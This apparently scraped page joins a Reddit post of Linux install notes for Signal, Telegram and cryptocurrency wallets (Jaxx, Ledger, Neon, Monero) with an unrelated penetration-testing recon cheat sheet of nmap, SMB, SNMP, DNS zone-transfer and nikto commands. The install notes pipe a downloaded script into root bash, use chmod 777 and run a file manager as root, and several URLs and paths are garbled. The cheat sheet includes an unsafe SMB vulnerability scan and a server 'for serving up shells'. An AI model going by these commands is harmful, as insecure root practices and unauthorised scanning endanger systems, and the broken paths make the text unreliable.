Installing standalone Signal Desktop

Download the repository's key and install it into the system
$ curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
$ sudo add-apt-repository "deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main"
$ sudo apt update
$ sudo apt install signal-desktop

Install Telegram

$ sudo add-apt-repository ppa:atareao/telegram
$ sudo apt-get update
$ sudo apt-get install telegram

Installing standalone Signal Desktop

First, use this command to download the repository's key and install it into the system
$ curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
Next, use this one to add the repository itself to the system
$ sudo add-apt-repository "deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main"
Then update the package database
$ sudo apt update
Finally, install the Signal Desktop
$ sudo apt install signal-desktop

Install JAXX Wallet - jaxx.io

This can be done as an app image or as a chromium extension
https://jaxx.io/downloads.html
Copy jaxx-1.3.15-x86_64.AppImage to \Documents\wallets
Jaxx requires Ubuntu 12.04, Fedora 21, or Debian 8 (or later)
$sha1sum jaxx-1.3.15-x86_64.AppImage
sudo chmod 777 jaxx-1.3.15-x86_64.AppImage ./jaxx-1.3.15-x86_64.AppImage

Install Ledger Nano S

https://www.ledgerwallet.com/apps
https://www.ledger.com/products/ledger-nano-s
Download Ledger Live
https://support.ledgerwallet.com/hc/en-us/articles/115005165269-What-to-do-if-my-Ledger-Nano-S-is-not-recognized-on-Windows-and-or-Linux-
https://developer.chrome.com/apps/app_usb#caveats
On most Linux systems, USB devices are mapped with read-only permissions by default. To open a device through this API, your user will need to have write access to it too. A simple solution is to set a udev rule. Create a file /etc/udev/rules.d/50-yourdevicename.rules with the following content:
SUBSYSTEM=="usb", ATTR{idVendor}=="[yourdevicevendor]", MODE="0664", GROUP="plugdev"
$ sudo wget -q -O - https://raw.githubusercontent.com/LedgerHQ/udev-rules/masteadd_udev_rules.sh | sudo bash
If the system won't update the UDEV rules with the file copy the UDEV Directory to /etc/udev/ Run nautilus as root
$sudo nautilus
Use the File Explorer to copy the UDEV direstory to /etc/udev/

Install Ledger Chrome Extentions

https://www.ledgerwallet.com/apps/

Install Ledger Wallet - Ripple

Execute the installation in /home/username/Documents/Wallet
$ sudo dpkg -i ledger_wallet_ripple_linux_x64_1.0.3.deb
$ sudo apt-get install -f

[Install Ledger Wallet - NEO

NEON](http://neonwallet.com/)
Neon also provides software wallets for neo and nep-5 tokens
Download the .deb file for ubuntu from here : https://github.com/CityOfZion/neon-wallet/releases Once downloaded...
.deb file Install $ sudo dpkg -i Neon_0.2.4_amd64.Linux.deb $ sudo apt-get install -f
AppImage file Install Linux AppImage: ed1011f895b145a43bf65f9b288755848445391d680ce33f9860e990c84fdde8 sha256sum Neon-0.2.2-x86_64.Linux.AppImage sudo chmod 777 Neon-0.2.2-x86_64.Linux.AppImage ./Neon-0.2.2-x86_64.Linux.AppImage

Install Monero

Before proceeding with the compilation, the following packages are required:

update Ubuntu's repository

$ sudo apt update
Install dependencies to be able to compile Monero
$ sudo apt install build-essential cmake libboost-all-dev miniupnpc libunbound-dev graphviz doxygen libunwind8-dev pkg-config libssl-dev libcurl4-openssl-dev libgtest-dev libreadline-dev libminiupnpc-dev libzmq3-dev
Monero Official Download Links
Windows, 64-bit
macOS, 64-bit
Linux, 64-bit
Note: for these examples I'm using the file monero-linux-x64-v0.12.0.0.tar.bz2. Replace this file name with the current release file name.
$tar xjf monero-linux-x64-v0.12.0.0.tar.bz2
How you compile a program from a source
  1. open a console
  2. use the command cd to navigate to the correct folder. If there is a README file with installation instructions, use that instead.
  3. extract the files with one of the commands If it's tar.gz use tar xvzf PACKAGENAME.tar.gz if it's a tar.bz2 use tar xvjf PACKAGENAME.tar.bz2
./configure make sudo make install
github Download Site https://getmonero.org/downloads/#linux
Check Hashes at: https://getmonero.org/downloads/hashes.txt $ hashrat -sha256 monero-gui-linux-x64-v0.12.0.0.tar.bz2 $ hashrat -sha256 monero-linux-x64-v0.12.0.0.tar.bz2
Move the Monero applications to /Documents/wallet/monero/ or /usshare/bin/ or where you decide to install applications.

Compilation - This will take some research to do properly. I recommend downloading the tar file, check the hash against the SHA256 and make the file executable. But for those that want to compile from source here are my notes. I have done it, but it is involved and not a rookie task.

$ cd / (Change Directory to Root)
$ sudo mkdir -p /build/release/bin/
$ cp /home/dillingeDownloads/monero-gui-linux-x64-v0.12.0.0.tar.bz2 /build/release/bin/
$ cd /build/release/bin/

download the latest Monero source code from github

$ sudo git clone --recursive https://github.com/monero-project/monero

From inside /build/release/bin/ check the directory with ls to verify the directory /monero/ in the directory /build/release/bin/

Compile the release version. make # or make -j number_of_threads, e.g., make -j 2
$ cd monero
$ sudo make

go into monero folder

$ cd monero/
$/build/release/bin/monero/maker
$ cd /
$ sudo mkdir -p /opt/monero
$ sudo mv -v ./build/release/bin/monero/* /opt/monero/
$ cd /opt/monero/

alternatively make release can be used instead of make. This compiles

the source code without compiling unique tests which is faster, and can

avid problems if there are compilation errors with compiling the tests

Installationcd After successful compilation, the Monero binaries should be located in ./build/release/bin. I usually move the binaries into /opt/monero/ folder. This can be done as follows:

optional

This should result in:
/opt/monero/ ├── monero-blockchain-export ├── monero-blockchain-import ├── monerod └── monero-wallet-cli Now we can start the Monero daemon, i.e., monerod, and let it download the blockchain and synchronize itself with the Monero network. After that, you can run your the monero-wallet-cli.

launch the Monero daemon and let it synchronize with the Monero network

$ /opt/monero/monerod

launch the Monero wallet

/opt/monero/monero-wallet-cli Useful aliases (with rlwrap) monerod and monero-wallet-cli do not have tab-compliton nor history. This problem can be overcome using rlwrap.
Alternate Information and Source /git.com/moneroexamples/compile-monero-09-on-ubuntu-16-04/blob/masteREADME.md

install rlwrap

$ sudo apt install rlwrap

download monerod and monero-wallet-cli commands files

wget -O ~/.bitmonero/monerocommands_simplewallet.txt https://raw.githubusercontent.com/moneroexamples/compile-monero-09-on-ubuntu-16-04/mastemonerocommands_simplewallet.txt
Use a remote node to avoid the size of the Monero blockchain
Connecting to the node from the GUI wallet After you enter your password for your wallet, you will see a pop up that will give you the option to "use custom settings". Click on it. You will then be sent to the "Settings" page in the GUI. At this point you should see two text boxes to the right of a label that says "Daemon address". In the first box (the one to the left) you need to enter the address of the node that you want to connect to. This address might look like node.moneroworld.com or it could look like any old ip address. The smaller box to the right is where you enter the node's port. The default port is 18081 but if you are using a random node the port that is used will vary. The port for node.moneroworld.com uses 18089.
127.0.0.1 18081
node.moneroworld.com 18089

Customize Desktop

Edit Log In Image
$ sudo apt install lightdm-gtk-greeter-settings
$ pkexec lightdm-gtk-greeter-settings
Edit Grub Sttings
$ sudo gedit /etc/default/grub
$ sudo update-grub

This article is provided by u/blackfootradio at cryptotux

submitted by blackfootradio to CryptoTux [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usshare/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 - telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

nmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usshare/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usshare/doc/python-impacket-doc/examples /samrdump.py